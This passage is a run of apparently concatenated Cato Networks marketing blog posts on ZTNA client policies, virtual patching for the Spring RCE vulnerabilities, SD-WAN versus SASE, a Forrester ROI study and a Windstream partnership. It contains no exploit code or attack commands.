ZTNA solutions, however, rely mostly on user authentication, and when this becomes compromised, a perpetrator still has the capability to wreak havoc in the enterprise network and its connected assets. User account takeovers are quite common and are achieved by way of social engineering (e.g. phishing) and other techniques. Security experts agree that enterprise security teams should work under the assumption that user accounts have been, or at some point will be, compromised.
What’s Next
Recognizing this risk, and as part of our continuous quest to provide our customers with better security, Cato has released the Client Connectivity Policy (CCP) feature. CCP acts as an additional layer of security when connecting remote employees to the enterprise network. It adds user or group-level validations based on the client platform (Operating system), location, and Device Posture information (fig. 1). Clients are granted access only after fully satisfying the defined connectivity policies.
[caption id="attachment_24508" align="alignnone" width="1200"] Figure 1[/caption]
[boxlink link="https://www.catonetworks.com/resources/the-hybrid-workforce-planning-for-the-new-working-reality/?utm_source=blog&utm_medium=top_cta&utm_campaign=hybrid_workforce"] The Hybrid Workforce: Planning for the New Working Reality | Download eBook [/boxlink]
It is no longer enough to pass ZTNA authentication in order to access the enterprise network. The additional security layer added by Cato's CCP significantly reduces ZTNA related attack vectors, even for compromised accounts, and strengthens the enterprise's overall security posture.
While Device Posture itself is commonly used as part of ZTNA, Cato's CCP is unique in that Device Posture is just one source of information used to make access decisions (fig. 2). CCP also enables numerous different Device Posture checks that can be defined, and selectively implemented, for different users and groups. This provides security teams a high degree of flexibility when defining connectivity policies. For example, highly stringent requirements for users with access to highly sensitive enterprise assets e.g., "the crown jewels", and more relaxed requirements for users with limited access and lower risk potential.
[caption id="attachment_24510" align="alignnone" width="1200"] Figure 2[/caption]
The Bottom Line
In the evolving threat landscape of remote access, Zero Trust is just too trusting. Cato's Client Connectivity Policy takes ZTNA an extra step by adding a security layer capable of blocking access from unauthorized clients, even when the user account has been compromised. By using several independent evaluation criteria, and highly flexible Device Posture profiles, Cato's CCP keeps your enterprise's security posture one step ahead of your next attack.
Two Remote Code Execution (RCE) vulnerabilities have been discovered in the Java Spring framework used in AWS serverless and many other Java applications. At least...
Cato Patches Vulnerabilities in Java Spring Framework in Record Time Two Remote Code Execution (RCE) vulnerabilities have been discovered in the Java Spring framework used in AWS serverless and many other Java applications. At least one of the vulnerabilities has been currently assigned a critical severity level and is already being targeted by threat actors. Within 20 hours of the disclosure, Cato Networks customers were already protected from attacks on both vulnerabilities as Cato Networks security researchers researched, signed and enforced virtual patching across Cato SASE Cloud. No Cato Networks systems are affected by this vulnerability.
The two vulnerabilities come following a recent release of a Spring Cloud Function. One vulnerability, Spring4Shell, is very severe and exploited in the wild. No patch has been issued. The second vulnerability, CVE-2022-22963, in the Spring Cloud Function has now been patched by the Spring team who issued Spring Cloud Function 3.1.7 and 3.2.3.
Within 20 hours of the discovery, Cato customers were already protected against attacks against the vulnerabilities through virtual patches deployed across Cato. Cato researchers had already identified multiple exploitation attacks by threat actors. While no further action is needed, Cato customers are advised to patch any affected systems.
Similar to the Log4j vulnerability, CVE-2022-22963 already has multiple POCs and explanations on GitHub – making it easy to utilize by attackers. As part of the mitigation efforts by Cato’s security and engineering team we verified that no Cato Networks system has been affected by this vulnerability.
As we have witnessed with Log4j, vulnerabilities such as these can take organizations a very long time to patch. Log4j exploitations are still observed to this day, four months after its initial disclosure. Subsequent vulnerabilities may also be discovered and Cato’s security researchers will continue to monitor and research for these and other CVEs – ensuring customers are protected.
The SD-WAN contract renewal period is an ideal time to review whether SD-WAN fits into your future plans. While SD-WAN is a powerful and cost-effective...
Renewing Your SD-WAN? Here’s What to Consider The SD-WAN contract renewal period is an ideal time to review whether SD-WAN fits into your future plans. While SD-WAN is a powerful and cost-effective replacement for MPLS, enterprises need to make sure it answers their evolving needs, like cloud infrastructure, mitigating cyber risks, and enabling remote access from anywhere.
4 Things to Consider Before Renewing your SD-WAN Contract
Consideration #1: Security
Enterprises need to reduce their attack surface, ensuring that only required assets are accessible, and only to authorized users.
Questions to ask yourself:
Does my SD-WAN solution include advanced security models like ZTNA?
How does my SD-WAN’s security solution integrate with other point solutions?
Does my SD-WAN solution offer threat prevention and decryption?
Consideration #2: Cloud Optimization
Traffic from and to the cloud needs to be optimized in terms of performance and security.
Questions to ask yourself:
How does my SD-WAN solution manage multi-cloud environments?
Does my SD-WAN solution provide migration capabilities?
Can my SD-WAN solution scale according to my needs?
[boxlink link="https://www.catonetworks.com/resources/5-things-sase-covers-that-sd-wan-doesnt/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_sd-wan_gaps_answered_by_sase"] 5 Things SASE Covers that SD-WAN Doesn’t | EBOOK [/boxlink]
Consideration #3: Global Access
Enterprises need predictable and reliable transport to connect global locations to the cloud and data centers.
Questions to ask yourself:
Does my SD-WAN solution provide a global infrastructure to ensure low latency and optimized routing?
How does my SD-WAN solution ensure secure global access?
Will my SD-WAN solution provide an alternative in case of a network outage?
Consideration #4: Remote Access
Remote access for employees and external vendors needs to be supported to ensure business agility.
Questions to ask yourself:
How does my SD-WAN solution secure remote users?
How does my SD-WAN solution ensure remote users get optimized performance?
Does my SD-WAN solution protect from supply chain attacks?
SASE, the Next Step After SD-WAN
SASE (Secure Access Service Edge) provides value in areas where SD-WAN lacks. SASE is the next step after SD-WAN because it provides enterprises with all the point solutions’ advantages, but without the friction of integrating and maintaining them. SASE is a single platform that converges SD-WAN and network security into a single, cloud-native global service.
In fact, according to Gartner, by 2024, more than 60% of SD-WAN customers will have implemented a SASE architecture, compared to approximately 35% in 2020.
How SASE Answers Network and Security Requirements
Let’s see how SASE provides a solution for each of the considerations above.
Security – SASE’s converged, full security stack extends advanced and up-to-date security measures to all edges.
Cloud optimization – SASE provides frictionless and optimized cloud service with immediate scaling capabilities everywhere.
Global access – SASE PoPs deliver the service to users and locations that are nearest to them, as well as accelerating east-west and northbound traffic to the cloud.
Remote access – SASE delivers secure remote access, with the ability to instantly scale to address the new work-from-anywhere reality.
SD-WAN vs. SASE
After SD-WAN solves the branch-data center-edge challenge, SASE enables enterprises to globally expand their environment to the cloud in an optimized and secure manner.
Let’s see how the two compare:
How to Get Started with SASE
Cato is the world’s first SASE platform, converging SD-WAN and network security into a global cloud-native service. Cato optimizes and secures application access for all users and locations. Using Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure branch Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever’s next. Start now.
When SD-WAN emerged a decade ago, it quickly became a viable and cost-effective solution to MPLS. Back then, it was the technology for digital transformation....
5 SD-WAN Gaps that are Answered by SASE When SD-WAN emerged a decade ago, it quickly became a viable and cost-effective solution to MPLS. Back then, it was the technology for digital transformation. But today, enterprises have more advanced network and security needs, and IT leaders are realizing that SD-WAN doesn’t address them.
What’s the alternative? According to Gartner, it’s SASE (Secure Access Service Edge), an architecture that converges SD-WAN and security point solutions into a unified and cloud-native service. Gartner predicts that by 2024 more than 60% of SD-WAN customers will implement a SASE architecture.
This blog post will help you understand which SD-WAN gaps are answered by SASE, and how they are reconciled. To read the entire analysis, you can read the e-book.
SASE vs. SD-WAN for Enterprises
Let’s look at five network and security considerations modern enterprises have and how SD-WAN and SASE each respond to them.
1. Advanced Security
Enterprises today must prepare for cybersecurity attacks by implementing security solutions that will protect their critical applications. With SD-WAN, IT teams are required to add additional appliances, like NGFW, IPS and SWG. This increases the cost of deployments and complicates maintenance. SASE, on the other hand, has a built-in network security stack that secures all edges and all locations.
2. Remote Workforce
The hybrid work model is here to stay. Employees will continue to connect from home or other external locations, and third parties require access to the network as well. SD-WAN does not support this type of connectivity, since it was designed for replacing MPLS between physical locations. SASE, on the other hand, connects remote users from anywhere to the nearest PoP (point of presence), for optimized and secure access.
[boxlink link="https://www.catonetworks.com/resources/5-things-sase-covers-that-sd-wan-doesnt/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_sd-wan_gaps_answered_by_sase"] 5 Things SASE Covers that SD-WAN Doesn’t | EBOOK [/boxlink]
3. Cloud Readiness
Cloud connectivity is essential for business agility, global connectivity and access to business applications. SD-WAN is limited in cloud-readiness, and requires management and integration of proprietary appliances and expensive cloud connectivity solutions. SASE, on the other hand, is based on cloud datacenters that are connected to the SASE cloud. In addition, cloud applications don’t require integration and application traffic from edges is sent to cloud instances.
4. Global Performance
Global connectivity is the backbone of businesses, but SD-WAN provides connectivity through third-party backbone providers, which are not always reliable. SASE has a private global backbone that is WAN optimized.
5. Simple Management
Work has become more complicated and noisy than ever, so IT teams need a solution that will reduce overhead, not add to it. SD-WAN and security solutions require IT teams to manage, maintain and troubleshoot functions separately. SASE converges all functions, providing visibility and simple, centralized management.
Conclusion
Enterprises today need their IT and security to support and accelerate the development and delivery of new products, and to help them respond to business changes. SASE lowers business costs, complexity and risks by connecting network and security into a holistic platform.
To learn more about how SASE can replace SD-WAN and help IT teams prepare for the needs and opportunities of tomorrow, read the e-book. To get a consultation and understand how SASE can answer your specific needs, contact us.
In today’s business climate, standing still is the kiss of death. Businesses that wish to remain competitive, increase profit margins and improve customer success need...
The ROI of Doing Nothing: How and Why IT Teams Should Strategically Plan In today’s business climate, standing still is the kiss of death. Businesses that wish to remain competitive, increase profit margins and improve customer success need to adopt new technologies and discover new markets. To support these efforts, IT teams need to be prepared for digital change - by making a strategic leap towards a network and security architecture that enables rapid and agile digital transformation. After all, today’s point solutions that only address cloud migration, remote work or certain security threats, will only remain relevant for so long.
This blog post breaks down the considerations and requirements of strategic change, while comparing two courses of action - transforming early or waiting for the last minute - and proposes a plan for gradual adoption of SASE.
If you’d like to read a more in-depth breakdown of the process, with calculations and user testimonials, you’re welcome to view the e-book that this blog is based on.
5 Expected Network Demands in the Near Future
The first step to take when deciding how to address network changes is to understand what to expect, i.e why IT teams even need to change course. Let’s look at five network demands IT teams will probably encounter in the (very) near future.
1. Accelerated Application Migration to the Cloud
As more teams require access to applications and infrastructure in the cloud, IT teams need to find ways to manage user and service access, deal with “Shadow IT” and enforce cloud policies from legacy networks. This is essential for ensuring secure connectivity and business continuity.
2. Rising MPLS Bandwidth Costs
MPLS is expensive and eats up a large portion of IT spend. As applications generate more traffic, video and data, costs are expected to go up even more. IT teams need to find a more cost-effective replacement, or get a higher budget.
3. Connecting Remote Workers
Remote and hybrid work are expected to stay long after Covid-19. But, ensuring performance, security and user experience for WFA users with traditional remote-access VPN is mission impossible for IT teams. This requires a long-term solution that is both stable and reliable.
4. Connecting the Supply Chain
The new workforce consists of contractors, consultants and other service providers that require network access. However, connecting these outsourced suppliers also creates security threats. IT teams need to find a solution that enables external collaboration without the risk.
5. Rapid Global Expansion
Organizations are growing and expanding, both organically and through acquisitions. Many times, expansion takes place into new geographies and locations. IT teams are required to integrate new employees and users as quickly and seamlessly as possible, within hours and days, not months.
New Networking Demands Create New Organizational Challenges
Now that we’ve listed these network challenges, let’s understand what they mean for IT teams, on an organizational level.
Upgrades and Replacements for Hardware Appliances - More users and traffic mean more required network bandwidth. Once existing appliances reach their limit, they will need to be updated, which is both expensive and time-consuming.
Increased Cost of Human Resources - Securing and managing applications and services requires human talent and time. This means training, hiring or off-loading to a third party.
The Telco Headache - Managing a relationship with a Telco can be frustrating and cause major overhead. As needs grow, it will become even more difficult to find the right person who will take responsibility, answer tickets and respond to requests in a timely manner.
[boxlink link="https://www.catonetworks.com/resources/the-roi-of-doing-nothing/?utm_source=blog&utm_medium=top_cta&utm_campaign=roi_of_doing_nothing"] The ROI of Doing Nothing | EBOOK [/boxlink]
The Solution: Build a Digital Strategy and Act On It
With so many complicated networking challenges around the horizon, the question isn’t whether to transform, only when. To answer this question, it’s important to have a strategy in place. This strategy will allow you to address future challenges with ease and expertise, while eliminating headaches. Let’s look at two ways to build and act on a digital strategy.
The Cost of Acting Now vs. Acting Later
Businesses today face two options. For simplicity, let’s divide them into two stages: 1 and 2.
Stage 1 businesses are those that spend a significant, yet manageable, amount of their budget on MPLS. On the contrary, stage 2 companies spend an extremely large amount of money on MPLS, as new locations and workers that need to connect cloud applications and locations are added to the network.
IT teams can transform technologically when businesses are either in stage 1 or stage 2. By transforming early, problems of digital transformation can be easily avoided. Instead of putting out fires, stage 1 companies have time to plan, think through issues and devise a strategy for today and tomorrow’s requirements.
Stage 2 companies, on the other hand, are in the worst position to make a transition. This is because the money, resources and time spent on legacy solutions will determine how much money, resources and time they will have for new challenges, impacting the success and ROI of the new solution. Putting out fires is the worst reason to make a strategic decision.
The SASE Solution To Rapid Digital Transformation
According to Gartner, “Current network strategy architectures were designed with the enterprise data center as the focal point for access needs. Digital business has driven new IT architectures like cloud and edge computing and work-from-anywhere initiatives, which have in turn, inverted access requirements, with more users, devices, applications, services and data located outside of an enterprise than inside. The Covid-19 pandemic accelerated these trends.”
The industry has rallied around Gartner’s SASE (Secure Access Service Edge) architecture as the best solution to meet the challenges introduced by cloud, mobility and other dynamic shifting network traffic (which we described above).
This is because SASE provides:
Cloud-native connectivity
Worldwide access
Secure access
High performance
Access to any resource, including cloud applications and the Internet
A broad range of capabilities - NGFW, IPS, MDR and more
Scalability, without rigid constraints
5 Steps to SASE Adoption:
Think Strategically While Acting Gradually
We’ve determined that the current network is the problem and that SASE is the solution. This begs the question, how can IT teams adopt SASE without disrupting the business?
SASE can be adopted gradually and grow incrementally as current MPLS contracts expire. Here are the five steps to take to enable digital transformation and prepare your network for “whatever’s next”:
Step 1: No Change - Deploy SD-WAN devices to connect certain sites to MPLS and the Internet. The rest of the network and MPLS connections remain unmodified.
Step 2: Complement MPLS - Deploy SASE where MPLS is unavailable or too expensive, to improve connectivity to WAN applications.
Step 3: Introduce Security - Deploy functions like NGFW, Web gateways IPS, anti-malware, zero trust as existing applications meet end-of-life or can’t scale, or to new edges.
Step 4: Optimize Datacenter Access - Implement advanced routing to benefit SaaS applications instead of having them rely on the Internet, which is erratic.
Step 5: Connect Remote Users - Bring mobile and WFA users to the SASE cloud for optimized performance with ZTNA, while removing VPNs, servers, and other devices.
Conclusion: Time to Spring Into Action
Act now. You can start with a plan, a partial transition or testing, but don’t wait. By doing so, you will prevent:
High MPLS costs
Management overhead of siloed appliances and external services
Skyrocketing costs of complex MPLS networks
Constrained resources when MPLS costs rise
IT challenges to support network and security complexity
Slow and bulky networks that can’t meet digital transformation requirements
Low ROI following network and digital transformation
To learn more about the considerations and see a breakdown of transition costs and savings, access the ebook The ROI of Doing Nothing. To see how organizations can save money and achieve more than 200% ROI with Cato SASE Cloud, read the Forrester TEI (Total Economic Impact) Report.
WAN transformation with SD-WAN and SASE is a strategic project for many organizations. One of the common drivers for this project is cost savings, specifically...
Does WAN transformation make sense when MPLS is cheap? WAN transformation with SD-WAN and SASE is a strategic project for many organizations. One of the common drivers for this project is cost savings, specifically the reduction of MPLS connectivity costs. But, what happens when the cost of MPLS is low? This happens in many developing nations, where the cost of high-quality internet is similar to the cost of MPLS, so migration from MPLS to Internet-based last mile doesn’t create significant cost savings.
Should these customers stay with MPLS? While every organization is different, MPLS generally imposes architectural limitations on enterprise WANs which could impact other strategic initiatives. These include cloud migration of legacy applications, the increased use of SaaS applications, remote access and work from home at scale, and aligning new capacity, availability, and quality requirements with available budgets. In short, moving away from MPLS prepares the business for the radical changes in the way applications are deployed and how users access them.
Legacy MPLS WAN Architecture: Plane Old Hub and Spokes
MPLS WAN was designed decades ago to connect branch locations to a physical datacenter as a telco-managed network. This is a hard-wired architecture, that assumes most (or all) traffic needs to reach the physical datacenter where business applications reside. Internet traffic, which was a negligible part of the overall enterprise traffic, would backhaul into the datacenter and securely exit through a centralized firewall to the internet.
[boxlink link="https://www.catonetworks.com/resources/what-telcos-wont-tell-you-about-mpls?utm_source=blog&utm_medium=top_cta&utm_campaign=windstream_partnership_news"] What Others Won’t Tell You About MPLS | EBOOK [/boxlink]
Cloud migration shifts the Hub
Legacy MPLS design is becoming irrelevant for most enterprises. The hub and spokes are changing. For example, Office365. This SaaS application has dramatically shifted the traffic from on-premises Exchange and SharePoint in the physical datacenter, and offline copies of Office documents on users’ machines, to a cloud application. The physical datacenter is eliminated as a primary provider of messaging and content, diverting all traffic to the Office 365 cloud platform, and continuously creating real-time interaction between user’s endpoints and content stores in the cloud.
If you look at the underlying infrastructure, the datacenter firewalls and datacenter internet links carry the entire organization's Office 365 traffic, becoming a critical bottleneck and a regional single point of failure for the business.
Work from home shifts the Spokes
Imagine now, that we suddenly moved to a work-from-home hybrid model. The MPLS links are now idle in the deserted branches, and all datacenter inbound and outbound traffic is coming through the same firewalls and Internet links likely to create scalability, performance, and capacity challenges. In this example, centralizing all remote access to a single location, or a few locations globally, isn’t aligned with the need to provide secure and scalable access to the entire organization in the office and at home.
Internet links offer better alignment with business requirements than MPLS
While MPLS and high-quality direct internet access prices are getting closer, MPLS offers limited choice in aligning customer capacity, quality, and availability requirements with underlay budget.
Let’s look at availability first. While MPLS comes with contractually committed time to fix, even the most dedicated telco can’t always fix infrastructure damage in a couple of hours over the weekend. It may make sense to use a wired line and wireless connection managed by edge SD-WAN device to create physical infrastructure redundancy.
Capacity and quality pose a challenge as well. Traffic mix is evolving in many locations. For example, a retail store may want to run video traffic for display boards which will require much larger pipes. Service levels to that video streams, however, are different than those of Point-of-Sale machines. It could make sense to run the mission-critical traffic on MPLS or high-quality internet links and the best-effort video traffic on low-cost broadband links, all managed by edge SD-WAN.
Furthermore, if the video streams reside in the cloud, running them over MPLS will concentrate massive traffic at the datacenter firewall and Internet link chokepoint. It would make more sense to go with direct internet access connectivity at the branch, connect directly to the cloud application and stream the traffic to the branch. This requires adding a cloud-based security layer that is built to support distributed enterprises.
The Way Forward: MPLS is Destined to be replaced by SASE
Even if you don’t see immediate cost savings, shifting your thinking from MPLS-based network design to an internet- and cloud-first mindset is a necessity. Beyond the underlying network access, a SASE platform that combines SD-WAN, cloud-based security, and zero-trust network access will prepare your organization for the inevitable shift in how users’ access to applications is delivered by IT in a way that is optimized, secure, scalable, and agile.
In Cato, we refer to it as making your organization Ready for Whatever’s Next.
We are proud and excited to announce our partnership with Windstream Enterprise (WE), a leading Managed Service Provider (MSP) delivering voice and communication services across...
Windstream Enterprise partners with Cato Networks to Deliver Cloud-native SASE to organizations in North America We are proud and excited to announce our partnership with Windstream Enterprise (WE), a leading Managed Service Provider (MSP) delivering voice and communication services across North America. WE will offer Cato’s proven and mature SASE platform to enterprises of all sizes.
Cato offers WE a unique business and technical competitive advantage. By leveraging Cato’s SASE platform, WE can rapidly deploy a wide range of networking and security capabilities across locations, users, and applications to enable customers’ digital transformation journeys. Unlike SASE solutions composed from point products, Cato’s converged platform enables WE to get to market faster with a feature-rich SASE solution and meet unprecedented customer demand.
Agility and velocity are critical for both partners and customers today. Businesses expand geographically, grow through M&A, instantly adapt to new ways of work, and must protect themselves against the evolving threat landscape. These ever-changing requirements call for dynamic, scalable, resilient, and ubiquitous network and security infrastructure that can be ready for whatever comes next.
[boxlink link="https://www.catonetworks.com/news/windstream-enterprise-delivers-sase-solution-with-cato-networks/?utm_source=blog&utm_medium=top_cta&utm_campaign=windstream_partnership_news"] Windstream Enterprise Delivers North America’s First Comprehensive Managed SASE Solution with Cato Networks | News [/boxlink]
This is the promise of SASE that Cato Networks has been perfecting for the past seven years. There is no other SASE offering in the market that can deliver on that promise with the same simplicity, velocity, and agility as Cato. Here are some of the benefits that WE and our mutual customers will experience with Cato SASE:
Rapidly evolving networking and security capabilities: Cato’s cloud-native software stack includes SD-WAN, Firewall as a Service (FWaaS), Secure Web Gateway (SWG), Advanced Threat Prevention with IPS and Next-Gen Anti-Malware, Cloud Access Security Broker (CASB) and Zero Trust Network Access (ZTNA). Cato experts ensure these capabilities rapidly evolve and adapt to new business requirements and security threats without any involvement from our partners and customers.
Instant-on for locations and users: WE can connect enterprise customers locations and users to Cato quickly through zero-touch provisioning and let the Cato SASE Cloud handle the rest (route optimization, quality of service, traffic acceleration, and security inspection).
Elastic capacity, available anywhere: Cato SASE Cloud can handle huge traffic flows of up to 3 Gbps per location in North America and globally through a dense footprint of Points-of-Presence (PoPs). No capacity planning is needed.
Fully automated self-healing: Cato’s cloud-native SASE is architected with automated intelligent resiliency from the customer edge to the cloud service PoPs. High availability by design ensures service continuity without any human intervention. No need for complex HA planning and orchestration.
True single pane of glass: Since Cato is a fully converged platform, it was built with a single management application to manage all configuration, reporting, analytics, and troubleshooting across all functions. Additionally, customers gain access to WE Connect Portal to enable easy configuration, analysis, and automation of their fully cloud-native SASE framework.
Through our partnership, powerful SASE managed services become easier and more efficient to deliver. Cato and WE are ready to usher customers into a new era where advanced managed services meet a cloud-native software platform to create a customer experience and deliver customer value like never before.
We’ve been touting the real-world benefits of Cato SASE on our Web site and in seminars, case studies, and solution briefs since the company was...
Eye-Opening Results from Forrester’s Cato SASE Total Economic Impact Report We’ve been touting the real-world benefits of Cato SASE on our Web site and in seminars, case studies, and solution briefs since the company was founded, but how do those benefits translate into hard numbers? We decided it was time to quantify Cato SASE’s real-world financial benefit with a recognized, well-structured methodology, so we commissioned a Total Economic Impact (TEI) study with the consulting arm of the leading analyst firm Forrester.
Forrester interviewed several Cato customers in-depth and used its proprietary TEI methodology to come up with numbers for investment impact, benefits, costs, flexibility, and risks. More on this later.
The results were impressive. According to Forrester, Cato’s ROI came out to 246% over three years with total savings of $4.33 million net present value (NPV) and a payback of the initial investment in under six months. Those numbers don’t include additional savings from less tangible benefits such as risk reduction.
The $4.33 million NPV savings break down this way:
$3.8 million savings in reduced operations and maintenance
$44,000 savings in reduced time to configure Cato at new sites
$2.2 million savings from retiring all the systems replaced by Cato Networks
Investment of $1.76 million over three years
$6.09 million – $1.76 million = $4.33 million NPV.
Numbers Are Only Half the Story
The numbers are certainly impressive, but some of the unquantified benefits the report picked up were perhaps even more enlightening:
Improved employee morale: Team members reported that the activities they were able to shift to after switching to Cato—optimizing systems, for example--were considerably more rewarding than the more mundane activities of setting up, updating, and managing a lot of equipment before Cato.
Consistent security rules: Deploying Cato revealed a lot of inconsistencies in organizations’ governing and securing of network traffic across different sites. The Cato SASE Cloud was able to quickly consolidate all that mess into a single global set of rules, with an obvious positive impact on both security and management.
Reduced time and transit costs: Cato equipment moves through customs without delay or assessments of value-added tax (VAT). This is because Cato Sockets are very simple devices that simply direct traffic to our cloud, where most of the complex encryption and other technologies lie.
Better application performance: We expected this result, which comes from improved network performance.
Overall, respondents describe a transformative, before/after experience.
[boxlink link="https://www.catonetworks.com/resources/the-total-economic-impact-of-cato-networks/?utm_source=blog&utm_medium=top_cta&utm_campaign=tei_report"] The Total Economic Impact™ of Cato Networks | Report [/boxlink]
Before Cato, the organizations had to dedicate separate teams to the costly, time-consuming complexities of managing VPNs, Internet, WAN, and other functions, including spending a lot of time and resources deploying updates at each individual site. Adding new sites was a complex time-consuming process. All that mundane work made it difficult to execute the corporate digital transformation strategy.
As one technology director said about why he turned to Cato, “My goal was, I don’t want my team worrying about how to get a packet from A to B. I’m interested in Layer 7 of the network stack. I want to know: Are applications behaving the way they should? Are people getting the performance they should? Are we secure? You don’t have time to answer that if you’re worried about getting it from A to B.”
After Cato, all of the updates and most of the management were simply delegated to the Cato SASE Cloud. All the remaining network and security oversight required by the customer could be accomplished through a single Cato dashboard. This allowed organizations to redirect all those “before” resources to value-added activities such as system optimization, onboarding new acquisitions, and fast deployment of new sites.
The resulting employee satisfaction benefits were substantial. As a technology director said, “What I heard from my team is, ‘I love that the problems I’m solving on a day-to-day basis are on a completely different order than what I used to have to deal with before.’ They think about complex traffic problems and application troubleshooting and performance.”
Setting up new sites was also vastly easier with Cato, as one IT manager said. “Honestly I was shocked to see how easy it was to set up and maintain an SD-WAN solution based on the whole Cato dashboard. Now there’s a saying that with [unnamed previous solution] you need 10 engineers to set it up and 20 engineers to keep it running. With Cato this all went away.”
How Forrester Got The Numbers
Forrester’s findings were the result of in-depth interviews with five decision-makers whose organizations are Cato customers. Forrester compared data based on their experiences prior to deploying Cato with a composite organizational model of a “vanilla” customer. The description of the five decision-makers is in the table below.
The report describes the composite organization that is representative of the five decision-makers that Forrester interviewed and is used to present the aggregate financial analysis in the next section. The global company is headquartered in the U.S. with 40 sites across the U.S., Europe, and the Asia Pacific region growing to 61 by year three. It also has two on-premises and two cloud datacenters in the U.S, one on-premises and two cloud-based datacenters in Europe, and two cloud-based datacenters in Asia Pacific. Year one remote users total 1,500 growing to 2,100 by year three.
Forrester then used its proprietary TEI methodology to construct a financial model with risk-adjusted numbers. The TEI modeling fundamentals included investment impact, benefits, costs, flexibility, and risks.
Some of the more dramatic savings numbers came in operations and maintenance: The organization was able to redirect 10 full-time employees (FTEs) from operations and maintenance to more value-adding activities in year one. By year three it avoided having to hire 12 more FTEs that would have had to manage the previous solution. The average fully loaded annual compensation for a single full-time data engineer is $148,500.
Lots of savings also came from retired systems, including the traditional edge router, perimeter next-generation firewall appliances, intrusion detection and prevention systems, and SD-WAN.
And then there were benefits from Cato’s remote access flexibility. As one IT team manager said, “When COVID hit we were able to add the entire company to the VPN and provide them the ability to work from home in a matter of days. That was amazing.” (Follow the link to read more about Cato’s approach to secure remote access).
I could go on but take a look for yourself. There’s a lot more juicy data in the report and it’s pretty surprising at times and not a difficult read. You can access The Total Economic Impact™ of Cato Networks report following the link.
SD-WAN networks provide multiple benefits to organizations, especially when compared to MPLS. SD-WAN improves cloud application performance, reduces WAN costs and increases business agility. However,...
Is SD-WAN Enough for Global Organizations? SD-WAN networks provide multiple benefits to organizations, especially when compared to MPLS. SD-WAN improves cloud application performance, reduces WAN costs and increases business agility. However, SD-WAN also has some downsides, which modern organizations should take into consideration when choosing SD-WAN or planning its implementation.
This blog post lists the top considerations for enterprises that are evaluating and deploying SD-WAN. It is based on the e-book “The Dark Side of SD-WAN”.
Last Mile Considerations
SD-WAN provides organizations with flexibility and cost-efficiency compared to MPLS. For the last mile, SD-WAN users can choose their preferred service, be it MPLS or last-mile services like fiber, broadband, LTE/4G, or others.
When deciding which last-mile solution to choose, we recommend taking the following criterion into consideration:
Costs
Redundancy (to ensure availability)
Reliability
Learn more about optimizing the last mile.
Middle Mile Considerations
MPLS provides predictability and stability throughout the middle mile. When designing the SD-WAN middle mile, organizations need to find a solution that provides the same capabilities.
Relying on the Internet is not recommended, since it is unpredictable. The routers are stateless and control plane intelligence is limited, which means routing decisions aren’t based on application requirements or current network levels. Instead, providers’ commercial preferences often take priority.
Learn more about reliable global connectivity.
Security Considerations
Distributed architectures require security solutions that can support multiple edges and datacenters. The four main options enterprises have today are:
The SD-WAN Firewall
Pros:
- Built into the SD-WAN appliance
Cons:
- Do not inspect user traffic
Purchasing a Unified Threat Management Device
Pros:
- Inspects user traffic
Cons:
- Requires a device for each location, which is costly and complex
Cloud-based Security
Pros:
- Eliminated firewalls at every edge
Cons:
- Based on multiple devices - the datacenter firewall, the SD-WAN and the cloud security device. This is also costly and complex.
A Converged Solution
SASE (Secure Access Service Edge) - converges SD-WAN at the edge and security in the middle, with one single location for policy management and analytics.
Cloud Access Optimization Considerations
In a modern network, external datacenters and cloud applications need to be accessed by the organization’s users, branches and datacenters. Relying on the Internet is too risky in terms of performance and availability.
It is recommended to choose a solution that offers premium connectivity or to choose a cloud network that egresses traffic from edges as close as possible to the target cloud instance.
[boxlink link="https://www.catonetworks.com/resources/the-dark-side-of-sd-wan-are-you-prepared?utm_source=blog&utm_medium=top_cta&utm_campaign=dark_side_ebook"] The Dark Side of SD-WAN | Read The eBook [/boxlink]
Network Monitoring Considerations
When monitoring the network, enterprises need to be able to identify issues in a timely manner, open tickets with ISPs and work with them until the issue is resolved.
It is recommended to set up 24/7 support and monitoring to orchestrate this and prevent outages that could impact the business.
Considerations When Managing the SD-WAN
Transitioning to SD-WAN requires deciding how to manage relationships with all the last-mile ISPs, as well as the network itself. You can manage these internally or outsource to providers.
Ask yourself the following questions:
Is it easier to manage multiple providers directly or through a single external aggregator?
How much control do you need over deployment and integrations?
What are your priorities for your internal talent’s time and resources?
Conclusion
Organizations today need to shift to support the growing use of cloud-based applications and mobile users. SD-WAN is considered a viable option by many. But is it enough? Use this blog post to evaluate if and how to implement SD-WAN. To get more details, read the complete e-book.
To learn more about SASE, let’s talk.
SASE (Secure Access Service Edge) is a new enterprise architecture technology that converges all network and security needs, by design. By replacing all point solutions,...
8 Reasons Enterprises are Adopting SASE Globally SASE (Secure Access Service Edge) is a new enterprise architecture technology that converges all network and security needs, by design. By replacing all point solutions, SASE provides a unified, global and cloud-based network that supports all edges. As a result, SASE solutions improve organizational performance, business agility and connectivity. They also reduce IT overhead.
Ever since SASE was coined as a category by Gartner in 2019, the global adoption of SASE has grown significantly. Here are eight drivers and global trends that are driving this change.
This blog post is based on the e-book “8 SASE Drivers for Modern Enterprises”.
8 SASE Drivers for Modern Enterprises
1. Enabling the “Branch Office of One”
Thanks to mobile devices and constant connectivity, employees can stay connected at all times and work from anywhere. This has turned them into a “branch office of one”, i.e a fully functional business unit, consisting of one person.
The remote working trend has been intensified by COVID-19, which has significantly enhanced its adoption. Some form of working from home is probably here to stay. McKinsey found that 52% of employees would prefer a flexible working model even after COVID.
Therefore, IT and security teams are adopting SASE solutions to enable these “branches of one” to work seamlessly and securely. SASE optimizes traffic to any edge while continuously inspecting traffic for threats and access control. This ensures all employees anywhere are productive, can access all company assets and can communicate with all employees and partners, at all times.
2. Direct-to-Internet Branch Access
Traditional branch offices are also evolving. Many employees have a constant need to communicate with others across the world and to connect to global cloud infrastructures, platforms and applications. So while these employees might be sitting together physically, they are de facto a collection of branch offices of one, with intensive communication and security requirements.
IT and security teams are implementing SASE solutions to enable high-performance to the cloud for these employees. SASE provides SD-WAN capabilities and a global private backbone that replaces the costly MPLS and the erratic Internet.
[boxlink link="https://www.catonetworks.com/resources/8-sase-drivers-for-modern-enterprises/?utm_source=blog&utm_medium=top_cta&utm_campaign=8_sase_drivers"] 8 SASE Drivers for Modern Enterprises | eBook [/boxlink]
3. Consolidating Vendors
